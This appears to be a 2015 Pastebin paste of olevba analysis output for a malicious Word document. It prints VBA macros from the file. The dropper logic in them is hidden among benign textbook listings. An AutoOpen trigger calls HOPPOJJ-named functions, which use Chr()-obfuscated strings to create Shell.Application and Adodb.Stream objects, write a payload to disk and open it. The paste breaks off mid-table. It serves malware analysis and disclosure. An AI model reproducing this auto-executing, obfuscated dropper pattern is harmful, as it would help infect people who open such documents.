SHARE
TWEET

Malicious Word macro

dynamoo Jun 9th, 2015 312 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 1913.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 1913.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 1913.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub A121212121212(FFFFF As Long)
  17.  
  18. HOPPOJJ2222
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()
  23.  
  24. A121212121212 (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +------------+-------------+-----------------------------------------+
  32. | Type       | Keyword     | Description                             |
  33. +------------+-------------+-----------------------------------------+
  34. | AutoExec   | AutoOpen    | Runs when the Word document is opened   |
  35. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  36. |            |             | be used to obfuscate strings (option    |
  37. |            |             | --decode to see all)                    |
  38. +------------+-------------+-----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Module1.bas
  41. in file: 1913.doc - OLE stream: u'Macros/VBA/Module1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. Sub AddCustomer()
  44.     '
  45.    ' Set up the form and then Show it
  46.    '
  47.    With frmCustomer
  48.         .Caption = "Add Customer"   ' Set form title
  49.        .Controls("cmdAction").Caption = "Add"      ' Make sure first button is Add
  50.        .Controls("cmdCancel").Caption = "Cancel"   ' Start second button as Cancel
  51.        .Show
  52.     End With
  53.     Set frmCustomer = Nothing
  54. End Sub
  55.  
  56. ' Listing 17.9. The EditCustomer procedure runs when you select
  57. ' the Edit Customer command or click the Edit Customer button.
  58. '
  59. Sub EditCustomer()
  60.     '
  61.    ' Make sure selection is inside database
  62.    '
  63.    If Not InsideDatabase(ActiveCell.Row) Then
  64.         Exit Sub
  65.     End If
  66.     '
  67.    ' Set up the form and then Show it
  68.    '
  69.    With frmCustomer
  70.         .Caption = "Edit Customer"
  71.         .Controls("cmdAction").Caption = "OK"
  72.         .Show
  73.     End With
  74.     Set frmCustomer = Nothing
  75. End Sub
  76.  
  77. ' Listing 17.10. This function that determines whether
  78. ' or not the active cell is inside the Database range.
  79. '
  80. Function InsideDatabase(currRow As Integer)
  81.  
  82.     With d.Range("Database")
  83.         If .Rows.Count = 1 Then
  84.             MsgBox Prompt:="There are no records in the database.", _
  85.                    Title:="Customer Database", _
  86.                    Buttons:=vbExclamation
  87.             InsideDatabase = False
  88.             Exit Function
  89.         End If
  90.         If currRow <= .Row Or currRow >= (.Row + .Rows.Count) Then
  91.             MsgBox Prompt:="You must select a record inside the database.", _
  92.                    Title:="Customer Database", _
  93.                    Buttons:=vbExclamation
  94.             InsideDatabase = False
  95.         Else
  96.             InsideDatabase = True
  97.         End If
  98.     End With
  99.  
  100. End Function
  101.  
  102. ' Listing 17.11. The FilterCustomers procedure runs when you
  103. ' select the Filter Customers command or click the Filter
  104. ' Customers button.
  105. '
  106. Sub FilterCustomers()
  107.     Dim criteriaCells As Range
  108.     Dim c As Range
  109.     Dim criteriaEmpty As Boolean
  110.     '
  111.    ' Make sure the Criteria range contains a value
  112.    '
  113.    criteriaEmpty = True
  114.     Set criteriaCells = d.Range("Criteria").Offset(1).Resize(RowSize:=1)
  115.     For Each c In criteriaCells
  116.         If d.c.Value <> "" Then criteriaEmpty = False
  117.     Next 'c
  118.    If criteriaEmpty Then
  119.         MsgBox "The Criteria range is empty!" & Chr(13) & _
  120.                "Please enter criteria before filtering the database."
  121.         Exit Sub
  122.     End If
  123.     '
  124.    ' Filter the database according the the Criteria range values
  125.    '
  126.    d.Range("Database").AdvancedFilter _
  127.         Action:=xlFilterInPlace, _
  128.         CriteriaRange:=d.Range("Criteria")
  129. End Sub
  130.  
  131. ' Listing 17.12. The ShowAllCustomers procedure runs when you
  132. ' select the Show All Customers command or click the Show All
  133. ' Customers button.
  134. '
  135. Sub ShowAllCustomers()
  136.     With ActiveSheet
  137.         If .FilterMode Then .ShowAllData
  138.     End With
  139. End Sub
  140.  
  141. ' Listing 17.13. The CountCustomers procedure runs when you
  142. ' select the Count Customers command or click the Count
  143. ' Customers button.
  144. '
  145. Sub CountCustomers()
  146.     Dim totalRows As Integer
  147.     Dim alertMsg As String, alertButtons As Integer, alertTitle As String
  148.     '
  149.    ' Customer count is total rows in Database, minus 1
  150.    '
  151.    totalRows = d.Range("Database").Rows.Count - 1
  152.    
  153.     alertMsg = "There are currently " & _
  154.         totalRows & _
  155.         " customers in the database."
  156.     alertButtons = vbInformation
  157.     alertTitle = "Customer Database"
  158.     MsgBox alertMsg, alertButtons, alertTitle
  159.    
  160. End Sub
  161.  
  162. ' PhoneCustomer()
  163. ' The PhoneCustomer procedure runs when you select the
  164. ' Phone Customer command or click the Phone Customer button.
  165. '
  166. Sub PhoneCustomer()
  167.     On Error GoTo BadStart
  168.     Dim currCell As Range
  169.     Dim currRow As Integer
  170.     Dim response As Integer
  171.     Dim phoneNumber As String
  172.     Dim firstName As String
  173.     Dim lastName As String
  174.     Dim alertMsg As String
  175.     Dim alertButtons As Integer
  176.     Dim alertTitle As String
  177.     Dim winDrive As String
  178.     Dim winFolder As String
  179.     '
  180.    ' Turn off screen updates and save the active cell
  181.    '
  182.    Application.ScreenUpdating = False
  183.     Set currCell = ActiveCell
  184.     currRow = d.currCell.Row
  185.     '
  186.    ' Make sure selection is inside database
  187.    '
  188.    If Not InsideDatabase(currRow) Then
  189.         Exit Sub
  190.     End If
  191.     '
  192.    ' Get data for MsgBox message
  193.    '
  194.    firstName = d.Cells(currRow, d.Range("FirstNameField").Column)
  195.     lastName = d.Cells(currRow, d.Range("FirstNameField").Column + 1)
  196.     d.Cells(currRow, d.Range("PhoneNumberField").Column).Select
  197.     '
  198.    ' Check to see if phone number is blank
  199.    '
  200.    phoneNumber = ActiveCell
  201.     If phoneNumber = "" Then
  202.         MsgBox Prompt:="There is no phone number for this customer.", _
  203.                Title:="Customer Database", _
  204.                Buttons:=vbExclamation
  205.         Exit Sub
  206.     End If
  207.     '
  208.    ' Display the message
  209.    '
  210.    alertMsg = "About to dial the following customer:" & _
  211.         Chr(13) & Chr(13) & _
  212.         firstName & " " & lastName & _
  213.         Chr(13) & _
  214.         phoneNumber & _
  215.         Chr(13) & Chr(13) & _
  216.         "Please make sure your modem is turned on."
  217.     alertButtons = vbOKCancel + vbExclamation
  218.     alertTitle = "Phone Customer"
  219.     response = MsgBox(alertMsg, alertButtons, alertTitle)
  220.     '
  221.    ' If user Cancels, return to active cell and bail out
  222.    '
  223.    If response = vbCancel Then
  224.         currCell.Select
  225.         Exit Sub
  226.     End If
  227.     '
  228.    ' Otherwise, copy phone number to Clipboard and phone the customer
  229.    '
  230.    ActiveCell.Copy
  231.     '
  232.    ' Start Phone Dialer with the focus
  233.    '
  234.    If InStr(1, d.Application.OperatingSystem, "NT") Then
  235.         '
  236.        ' Use this line with Windows NT:
  237.        '
  238.        winDrive = Left(Environ("WINDIR"), 3)
  239.         Shell winDrive & "Program Files\Windows NT\dialer.exe", 1
  240.     Else
  241.         '
  242.        ' Use this line with Windows 95/98:
  243.        '
  244.        winFolder = Environ("WINDIR")
  245.         Shell winFolder & "\dialer.exe", 1
  246.     End If
  247.     '
  248.    ' Paste the copied phone number with Ctrl+V and
  249.    ' then press Enter to select the Dial button
  250.    '
  251.    SendKeys "^v~", True
  252.     '
  253.    ' Wait eight seconds to give the modem time to dial
  254.    '
  255.    d.Application.Wait Now + TimeValue("00:00:08")
  256.     '
  257.    ' Close the dialog boxes and exit Phone Dialer
  258.    '
  259.    SendKeys "~{ESC}%{F4}"
  260.     '
  261.    ' Get rid of Excel's Copy mode indicators and
  262.    ' select the original cell
  263.    '
  264.    d.Application.CutCopyMode = False
  265.     currCell.Select
  266.  
  267.     Exit Sub
  268.  
  269. BadStart:
  270.     MsgBox "Could not start Phone Dialer!", _
  271.         vbOKOnly + vbExclamation
  272. End Sub
  273.  
  274. ' DeleteCustomer()
  275. ' The DeleteCustomer procedure runs when you select the
  276. ' Delete Customer command or click the Delete Customer button.
  277. '
  278. Sub DeleteCustomer()
  279.     '
  280.    ' Make sure selection is inside database
  281.    '
  282.    If Not InsideDatabase(ActiveCell.Row) Then
  283.         Exit Sub
  284.     End If
  285.     '
  286.    ' Set up the form and then Show it
  287.    '
  288.    With frmCustomer
  289.         .Caption = "Delete Customer"   ' Set form title
  290.        .Controls("cmdAction").Caption = "Delete"   ' Make sure first button is Add
  291.        .Controls("cmdCancel").Caption = "Cancel"   ' Start second button as Cancel
  292.        .Show
  293.     End With
  294.     Set frmCustomer = Nothing
  295. End Sub
  296.  
  297. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  298. ANALYSIS:
  299. +------------+----------------+-----------------------------------------+
  300. | Type       | Keyword        | Description                             |
  301. +------------+----------------+-----------------------------------------+
  302. | Suspicious | Windows        | May enumerate application windows (if   |
  303. |            |                | combined with Shell.Application object) |
  304. | Suspicious | Chr            | May attempt to obfuscate specific       |
  305. |            |                | strings                                 |
  306. | Suspicious | Environ        | May read system environment variables   |
  307. | Suspicious | SendKeys       | May control another application by      |
  308. |            |                | simulating user keystrokes              |
  309. | Suspicious | Shell          | May run an executable file or a system  |
  310. |            |                | command                                 |
  311. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  312. |            |                | may be used to obfuscate strings        |
  313. |            |                | (option --decode to see all)            |
  314. | IOC        | dialer.exe     | Executable file name                    |
  315. +------------+----------------+-----------------------------------------+
  316. -------------------------------------------------------------------------------
  317. VBA MACRO Module5.bas
  318. in file: 1913.doc - OLE stream: u'Macros/VBA/Module5'
  319. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  320. Const DBLOCATION = "C:\Program Files\Microsoft Office\Office\Samples\Northwind.mdb"
  321. ' Listing 18.1. A procedure that connects to an Access database.
  322. '
  323. Sub DatabaseConnection()
  324.  
  325.     '
  326.    ' Open the Northwind database (check the path!)
  327.    '
  328.    If Dir(DBLOCATION) = "" Then
  329.         MsgBox "The location of the NorthWind sample " & _
  330.         "database is incorrect." & Chr(13) & _
  331.         "Please adjust the path and then run this " & _
  332.         "procedure again."
  333.         Exit Sub
  334.     End If
  335.     '
  336.    ' Open the Customers table (recordset)
  337.    '
  338.    Set rs = db.OpenRecordset("Customers")
  339.     '
  340.    ' Display confirmation message
  341.    '
  342.    MsgBox "Opened " & db.Name & " Successfully!" & _
  343.            Chr(13) & Chr(13) & _
  344.            "The open Recordset is " & rs.Name
  345.     '
  346.    ' Close and release the objects
  347.    '
  348.    rs.Close
  349.     db.Close
  350.     Set rs = Nothing
  351.     Set db = Nothing
  352. End Sub
  353.  
  354. ' Listing 18.2. A procedure that connects to a non-Jet database.
  355. '
  356. Sub NonJetConnection()
  357.     '
  358.    ' Open the Jet database (check the path!)
  359.    '
  360.    If Dir(DBLOCATION) = "" Then
  361.         MsgBox "The location of the NorthWind sample " & _
  362.         "database is incorrect." & Chr(13) & _
  363.         "Please adjust the path and then run this " & _
  364.         "procedure again."
  365.         Exit Sub
  366.     End If
  367.     '
  368.    ' Create TableDef and set the connection information.
  369.    ' This code assumes the CUSTOMER.DBF file (it's on the
  370.    ' CD) is in the same folder as this workbook.
  371.    '
  372.    Set tdDBASE = db.CreateTableDef("Linked dBASE Table")
  373.     tdDBASE.Connect = "dBASE IV;DATABASE=" & ThisWorkbook.Path
  374.     tdDBASE.SourceTableName = "Customer"
  375.     '
  376.    ' Append the TableDef to create the link
  377.    '
  378.    db.TableDefs.Append tdDBASE
  379.     '
  380.    ' Open the recordset
  381.    '
  382.    Set rs = db.OpenRecordset("Linked dBASE Table", dbOpenSnapshot)
  383.     '
  384.    ' Display confirmation message
  385.    '
  386.    MsgBox "Opened " & db.Name & " Successfully!" & _
  387.             Chr(13) & Chr(13) & _
  388.             "The open Recordset is " & rs.Name & _
  389.             Chr(13) & _
  390.             "The source table is " & tdDBASE.SourceTableName
  391.     '
  392.    ' Close and release the objects
  393.    '
  394.    rs.Close
  395.     db.Close
  396.     Set rs = Nothing
  397.     Set tdDBASE = Nothing
  398.     Set db = Nothing
  399. End Sub
  400.  
  401. ' Listing 18.3. A procedure that displays information on
  402. ' all the fields in a Recordset.
  403. '
  404. Sub DisplayFieldInfo()
  405.     Dim i As Integer
  406.     Dim fieldInfo As String
  407.     '
  408.    ' Open the Northwind database
  409.    '
  410.    If Dir(DBLOCATION) = "" Then
  411.         MsgBox "The location of the NorthWind sample " & _
  412.         "database is incorrect." & Chr(13) & _
  413.         "Please adjust the path and then run this " & _
  414.         "procedure again."
  415.         Exit Sub
  416.     End If
  417.     '
  418.    ' Open the Categories table
  419.    '
  420.    Set rs = db.OpenRecordset("Categories", dbOpenSnapshot)
  421.     '
  422.    ' Enumerate all fields in the Recordset
  423.    '
  424.    For i = 0 To rs.Fields.Count - 1
  425.         fieldInfo = "Recordset: " & rs.Name & Chr(13) & _
  426.             "Field " & _
  427.             i + 1 & " of " & _
  428.             rs.Fields.Count & Chr(13) & Chr(13)
  429.         '
  430.        ' Set the Field variable and then run through the properties
  431.        '
  432.        Set fld = rs.Fields(i)
  433.         fieldInfo = fieldInfo & _
  434.             "Name: " & fld.Name & Chr(13) & _
  435.             "Allow Zero Length: " & fld.AllowZeroLength & Chr(13) & _
  436.             "Attributes: " & fld.Attributes & Chr(13) & _
  437.             "Collating Order: " & fld.CollatingOrder & Chr(13) & _
  438.             "Default Value: " & fld.DefaultValue & Chr(13) & _
  439.             "Ordinal Position: " & fld.OrdinalPosition & Chr(13) & _
  440.             "Required: " & fld.Required & Chr(13) & _
  441.             "Size: " & fld.Size & Chr(13) & _
  442.             "Source Field: " & fld.SourceField & Chr(13) & _
  443.             "Source Table: " & fld.SourceTable & Chr(13) & _
  444.             "Type of Field: " & TypeOfField(fld.Type) & Chr(13) & _
  445.             "Validation Rule: " & fld.ValidationRule & Chr(13) & _
  446.             "Validation Text: " & fld.ValidationText
  447.         MsgBox Prompt:=fieldInfo, Title:="Field Information"
  448.     Next i
  449.     '
  450.    ' Close and release the objects
  451.    '
  452.    rs.Close
  453.     db.Close
  454.     Set rs = Nothing
  455.     Set fld = Nothing
  456.     Set db = Nothing
  457. End Sub
  458.  
  459. Public Function HOPPOJJ1122(HOPPOJJ1133 As String)
  460.     Set HOPPOJJ1144 = HOPPOJJ1155(Chr(83) & Chr(104) & "e" & "l" & Chr(108) & "." & Chr(65) & Chr(112) & Chr(112) & "l" & "i" & "c" & "a" & Chr(116) & "i" & Chr(111) & Chr(110))
  461. HOPPOJJ1144.Open (HOPPOJJ2211)
  462. End Function
  463. Public Function HOPPOJJ1155(HOPPOJJ1166 As String)
  464.     Set HOPPOJJ1155 = CreateObject(HOPPOJJ1166)
  465. End Function
  466. Public Function HOPPOJJ1177(HOPPOJJ2200 As Variant, HOPPOJJ1199 As String)
  467. Dim HOPPOJJ1188: Set HOPPOJJ1188 = HOPPOJJ1155("A" & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "m")
  468.  
  469. With HOPPOJJ1188
  470.    .Type = 1
  471.     .Open
  472.     .write HOPPOJJ2200
  473.     .savetofile HOPPOJJ1199, 2
  474. End With
  475. End Function
  476.  
  477.  
  478.  
  479. ' TypeOfField()
  480. ' Function to translate the constant returned by a Field object's
  481. ' Type property into a descriptive string.
  482. '
  483. Function TypeOfField(fldConstant As Integer) As String
  484.  
  485.     Select Case fldConstant
  486.         Case 1   ' dbBoolean
  487.            TypeOfField = "Boolean"
  488.         Case 2   ' dbByte
  489.            TypeOfField = "Byte"
  490.         Case 3   ' dbInteger
  491.            TypeOfField = "Integer"
  492.         Case 4   ' dbLong
  493.            TypeOfField = "Long Integer"
  494.         Case 5   ' dbCurrency
  495.            TypeOfField = "Currency"
  496.         Case 6   ' dbSingle
  497.            TypeOfField = "Single"
  498.         Case 7   ' dbDouble
  499.            TypeOfField = "Double"
  500.         Case 8   ' dbDate
  501.            TypeOfField = "Date"
  502.         Case 10  ' dbText
  503.            TypeOfField = "Text"
  504.         Case 11  'dbLongBinary
  505.            TypeOfField = "OLE Object"
  506.         Case 12  ' dbMemo
  507.            TypeOfField = "Memo"
  508.         Case 15  ' dbGUID
  509.            TypeOfField = "GUID"
  510.     End Select
  511. End Function
  512.  
  513. ' Listing 18.4. A procedure that opens a recordset using
  514. ' a SQL SELECT expression.
  515. '
  516. Sub QueryCustomers()
  517.     Dim strSELECT As String
  518.     '
  519.    ' Open the Northwind database (check the path!)
  520.    '
  521.    If Dir(DBLOCATION) = "" Then
  522.         MsgBox "The location of the NorthWind sample " & _
  523.         "database is incorrect." & Chr(13) & _
  524.         "Please adjust the path and then run this " & _
  525.         "procedure again."
  526.         Exit Sub
  527.     End If
  528.     '
  529.    ' Store the SELECT statement in a string variable
  530.    '
  531.    strSELECT = "SELECT CompanyName,Region,Country " & _
  532.                 "FROM Customers " & _
  533.                 "WHERE Country = 'Canada' " & _
  534.                 "ORDER BY CompanyName"
  535.     '
  536.    ' Open the recordset
  537.    '
  538.    Set rs = db.OpenRecordset(strSELECT)
  539.     '
  540.    ' Display confirmation message
  541.    '
  542.    MsgBox "The filtered Recordset contains " & _
  543.     rs.RecordCount & " records."
  544.     '
  545.    ' Close and release the objects
  546.    '
  547.    rs.Close
  548.     db.Close
  549.     Set rs = Nothing
  550.     Set db = Nothing
  551. End Sub
  552.  
  553. ' Listing 18.5. A procedure that creates a recordset from
  554. ' a QueryDef object.
  555. '
  556. Sub QueryDefExample()
  557.     '
  558.    ' Open the Northwind database (check the path!)
  559.    '
  560.    If Dir(DBLOCATION) = "" Then
  561.         MsgBox "The location of the NorthWind sample " & _
  562.         "database is incorrect." & Chr(13) & _
  563.         "Please adjust the path and then run this " & _
  564.         "procedure again."
  565.         Exit Sub
  566.     End If
  567.     '
  568.    ' Assign the QueryDef object
  569.    '
  570.    Set qd = db.QueryDefs("Products Above Average Price")
  571.     '
  572.    ' Open the recordset
  573.    '
  574.    Set rs = qd.OpenRecordset()
  575.     '
  576.    ' Display confirmation message
  577.    '
  578.    MsgBox "The filtered Recordset contains " & _
  579.         rs.RecordCount & " records."
  580.     '
  581.    ' Close and release the objects
  582.    '
  583.    rs.Close
  584.     db.Close
  585.     Set rs = Nothing
  586.     Set qd = Nothing
  587.     Set db = Nothing
  588. End Sub
  589.  
  590. ' Listing 18.6. A procedure that reads 100 rows from a
  591. ' recordset into a worksheet.
  592. '
  593. Sub ReadDataIntoExcel()
  594.     Dim recArray As Variant
  595.     Dim i As Integer, j As Integer
  596.     '
  597.    ' Open the Jet database, QueryDef, and Recordset
  598.    '
  599.    If Dir(DBLOCATION) = "" Then
  600.         MsgBox "The location of the NorthWind sample " & _
  601.         "database is incorrect." & Chr(13) & _
  602.         "Please adjust the path and then run this " & _
  603.         "procedure again."
  604.         Exit Sub
  605.     End If
  606.     Set qd = db.QueryDefs("Invoices")
  607.     Set rs = qd.OpenRecordset()
  608.     '
  609.    ' Head for Database Records and clear the sheet
  610.    '
  611.    With db.Worksheets("Database Records").[a1]
  612.         .CurrentRegion.Clear
  613.         '
  614.        ' Read the data using GetRows
  615.        '
  616.        recArray = rs.GetRows(100)
  617.         For i = 0 To UBound(recArray, 2)
  618.             For j = 0 To UBound(recArray, 1)
  619.                 .Offset(i + 1, j) = recArray(j, i)
  620.             Next j
  621.         Next i
  622.         '
  623.        ' Enter the field names and format the cells
  624.        '
  625.        For j = 0 To rs.Fields.Count - 1
  626.             .Offset(0, j) = rs.Fields(j).Name
  627.             .Offset(0, j).Font.Bold = True
  628.             .Offset(0, j).EntireColumn.AutoFit
  629.         Next j
  630.  
  631.     End With
  632.     '
  633.    ' Close and release the objects
  634.    '
  635.    rs.Close
  636.     db.Close
  637.     Set rs = Nothing
  638.     Set qd = Nothing
  639.     Set db = Nothing
  640. End Sub
  641.  
  642. ' Listing 18.7. A procedure that filters out OLE Object
  643. ' fields before retrieving a recordset.
  644. '
  645. Sub RetrieveCategories()
  646.     Dim strSELECT As String, i As Integer
  647.     '
  648.    ' Open the Jet database
  649.    '
  650.    If Dir(DBLOCATION) = "" Then
  651.         MsgBox "The location of the NorthWind sample " & _
  652.         "database is incorrect." & Chr(13) & _
  653.         "Please adjust the path and then run this " & _
  654.         "procedure again."
  655.         Exit Sub
  656.     End If
  657.     '
  658.    ' Open the full Categories table
  659.    '
  660.    Set rs = db.OpenRecordset("Categories")
  661.     '
  662.    ' The strSELECT variable will hold the SQL SELECT statement
  663.    ' that filters the Recordset to remove OLE Object fields
  664.    '
  665.    strSELECT = "SELECT "
  666.     '
  667.    ' Run through the recordset fields
  668.    '
  669.    For Each fld In rs.Fields
  670.         '
  671.        ' Check for OLE Object fields
  672.        '
  673.        If fld.Type <> dbLongBinary Then
  674.             '
  675.            ' If it's not an OLE Object field, add it to the SELECT statement
  676.            '
  677.            strSELECT = strSELECT & fld.Name & ","
  678.         End If
  679.     Next fld
  680.     '
  681.    ' Remove the trailing comma
  682.    '
  683.    strSELECT = Left(strSELECT, Len(strSELECT) - 1)
  684.     '
  685.    ' Add the FROM clause
  686.    '
  687.    strSELECT = strSELECT & " FROM Categories"
  688.     '
  689.    ' Open the filtered recordset
  690.    '
  691.    Set rs = db.OpenRecordset(strSELECT)
  692.     '
  693.    ' Retrieve the records
  694.    '
  695.    db.Worksheets("Database Records").Activate
  696.     With db.Worksheets("Database Records").[a1]
  697.         .CurrentRegion.Clear
  698.         .Offset(1).CopyFromRecordset rs
  699.         '
  700.        ' Enter the field names and format the cells
  701.        '
  702.        For i = 0 To rs.Fields.Count - 1
  703.             .Offset(0, i) = rs.Fields(i).Name
  704.             .Offset(0, i).Font.Bold = True
  705.             .Offset(0, i).EntireColumn.AutoFit
  706.         Next i
  707.     End With
  708.     '
  709.    ' Close and release the objects
  710.    '
  711.    rs.Close
  712.     db.Close
  713.     Set rs = Nothing
  714.     Set fld = Nothing
  715.     Set db = Nothing
  716. End Sub
  717.  
  718. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  719. ANALYSIS:
  720. +------------+----------------+-----------------------------------------+
  721. | Type       | Keyword        | Description                             |
  722. +------------+----------------+-----------------------------------------+
  723. | Suspicious | Open           | May open a file                         |
  724. | Suspicious | Chr            | May attempt to obfuscate specific       |
  725. |            |                | strings                                 |
  726. | Suspicious | CreateObject   | May create an OLE object                |
  727. | Suspicious | SaveToFile     | May create a text file                  |
  728. | Suspicious | Run            | May run an executable file or a system  |
  729. |            |                | command                                 |
  730. | Suspicious | sample         | May detect Anubis Sandbox               |
  731. | Suspicious | Write          | May write to a file (if combined with   |
  732. |            |                | Open)                                   |
  733. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  734. |            |                | may be used to obfuscate strings        |
  735. |            |                | (option --decode to see all)            |
  736. +------------+----------------+-----------------------------------------+
  737. -------------------------------------------------------------------------------
  738. VBA MACRO Module3.bas
  739. in file: 1913.doc - OLE stream: u'Macros/VBA/Module3'
  740. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  741. Public HOPPOJJ2211 As String
  742.  
  743. '
  744. ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
  745. '
  746. Sub GetNumbers()
  747.     Dim done As Boolean
  748.     Dim divisor As Variant
  749.     Dim dividend As Variant
  750.     '
  751.    ' Prompt user for dividend and divisor.
  752.    '
  753.    done = False
  754.     Do While Not done
  755.         dividend = InputBox("Enter the dividend:", "Divider")
  756.         divisor = InputBox("Enter the divisor:", "Divider")
  757.         done = Divide(dividend, divisor)
  758.     Loop
  759. End Sub
  760. '
  761. ' Listing 23.2. The Divide function divides the dividend by the divisor.
  762. ' The function traps "division by zero" errors.
  763. '
  764. Function Divide(dividend, divisor) As Boolean
  765.     Dim msg As String
  766.     Dim result As Single
  767.     '
  768.    ' Set the trap
  769.    '
  770.    On Error GoTo DivByZeroHandler
  771.     '
  772.    ' Peform the division
  773.    '
  774.    result = dividend / divisor
  775.     '
  776.    ' If it went okay, display the result
  777.    '
  778.    msg = dividend & _
  779.           " divided by " & _
  780.           divisor & _
  781.           " equals " & _
  782.           result
  783.     MsgBox msg
  784.     '
  785.    ' Set the return value and bypass the error handler
  786.    '
  787.    Divide = True
  788.     Exit Function
  789.     '
  790.    ' Code branches here if an error occurs
  791.    '
  792. DivByZeroHandler:
  793.     '
  794.    ' Display the error message
  795.    '
  796.    result = MsgBox("You entered 0 as the divisor! Try again?", _
  797.                     vbYesNo + vbQuestion, _
  798.                     "Divider")
  799.     '
  800.    ' Return the user's choice
  801.    '
  802.    If result = vbYes Then
  803.         Divide = False
  804.     Else
  805.         Divide = True
  806.     End If
  807. End Function
  808. '
  809. ' Listing 23.3 Backs up the active workbook to a drive specified by
  810. ' the user. Traps any errors (such as having no disk in the drive).
  811. '
  812.  
  813. Sub BackUpToFloppy()
  814.     Dim backupDrive As String
  815.     Dim backupName As String
  816.     Dim msg As String
  817.     Dim done As Boolean
  818.     Dim result As Integer
  819.     '
  820.    ' Define the location of the error handler
  821.    '
  822.    On Error GoTo ErrorHandler
  823.     '
  824.    ' Initialize some variables and then loop
  825.    '
  826.    Application.DisplayAlerts = False
  827.     done = False
  828.     backupDrive = "A:"
  829.     While Not done
  830.         '
  831.        ' Get the drive to use for the backup
  832.        '
  833.        backupDrive = InputBox( _
  834.             Prompt:="Enter the drive letter for the backup:", _
  835.             Title:="Backup", _
  836.             Default:=backupDrive)
  837.         '
  838.        ' Check to see if OK was selected
  839.        '
  840.        If backupDrive <> "" Then
  841.             '
  842.            ' Make sure the backup drive contains a colon (:)
  843.            '
  844.            If InStr(backupDrive, ":") = 0 Then
  845.                 backupDrive = Left(backupDrive, 1) & ":"
  846.             End If
  847.             '
  848.            ' First, save the file
  849.            '
  850.            ActiveWorkbook.Save
  851.             '
  852.            ' Assume the backup will be successful,
  853.            ' so set done to True to exit the loop
  854.            '
  855.            done = True
  856.             '
  857.            ' Concatenate drive letter and workbook name
  858.            '
  859.            backupName = backupDrive & ActiveWorkbook.Name
  860.             '
  861.            ' Make a copy on the specified drive
  862.            '
  863.            ActiveWorkbook.SaveCopyAs FileName:=backupName
  864.         Else
  865.             Exit Sub
  866.         End If
  867.     Wend
  868.     '
  869.    ' Bypass the error handler
  870.    '
  871.    Exit Sub
  872.     '
  873.    ' Code branches here if an error occurs
  874.    '
  875. ErrorHandler:
  876.     msg = "An error has occurred!" & Chr(13) & Chr(13) & _
  877.           "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
  878.           "letter, or Ignore to attempt the backup again."
  879.     result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
  880.     Select Case result
  881.         Case vbAbort
  882.             done = True
  883.         Case vbRetry
  884.             done = False
  885.             Resume Next
  886.         Case vbIgnore
  887.             Resume
  888.     End Select
  889. End Sub
  890. '
  891. ' Listing 23.4. This procedure divides two numbers. It traps three specific
  892. ' errors: division by zero, overflow, and type mismatch.
  893. '
  894. Sub DivideNumbers()
  895.     Dim msg As String
  896.     Dim result As Single
  897.     Dim divisor As Variant
  898.     Dim dividend As Variant
  899.     '
  900.    ' Set the trap
  901.    '
  902.    On Error GoTo DivByZeroHandler
  903.     '
  904.    ' Prompt user for the dividend
  905.    '
  906. GetDividendAndDivisor:
  907.     dividend = InputBox("Enter the dividend:", "Divider")
  908.     If dividend = "" Then Exit Sub
  909.     '
  910.    ' Prompt user for the divisor
  911.    '
  912. GetDivisorOnly:
  913.     divisor = InputBox("Enter the divisor:", "Divider")
  914.     If divisor = "" Then Exit Sub
  915.     '
  916.    ' Peform the division
  917.    '
  918.    result = dividend / divisor
  919.     '
  920.    ' If it went okay, display the result
  921.    '
  922.    msg = dividend & _
  923.           " divided by " & _
  924.           divisor & _
  925.           " equals " & _
  926.           result
  927.     MsgBox msg
  928.     '
  929.    ' Bypass the error handler
  930.    '
  931.    Exit Sub
  932.     '
  933.    ' Code branches here if an error occurs
  934.    '
  935. DivByZeroHandler:
  936.     '
  937.    ' Display the error message
  938.    '
  939.    msg = "An error occurred!" & Chr(13) & Chr(13) & _
  940.           "Error number:  " & Err.Number & Chr(13) & _
  941.           "Error message: " & Err.Description
  942.     MsgBox msg, vbOKOnly + vbCritical
  943.     '
  944.    ' Check the error number
  945.    '
  946.    Select Case Err.Number
  947.         '
  948.        ' Division by zero
  949.        '
  950.        Case 11
  951.             Resume GetDivisorOnly
  952.         '
  953.        ' Overflow
  954.        '
  955.        Case 6
  956.             Resume GetDividendAndDivisor
  957.         '
  958.        ' Type mismatch
  959.        '
  960.        Case 13
  961.             If Not IsNumeric(dividend) Then
  962.                 Resume GetDividendAndDivisor
  963.             Else
  964.                 Resume GetDivisorOnly
  965.             End If
  966.         '
  967.        ' Anything else, just quit
  968.        '
  969.        Case Else
  970.             Exit Sub
  971.     End Select
  972. End Sub
  973.  
  974. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  975. ANALYSIS:
  976. +------------+---------+-----------------------------------------+
  977. | Type       | Keyword | Description                             |
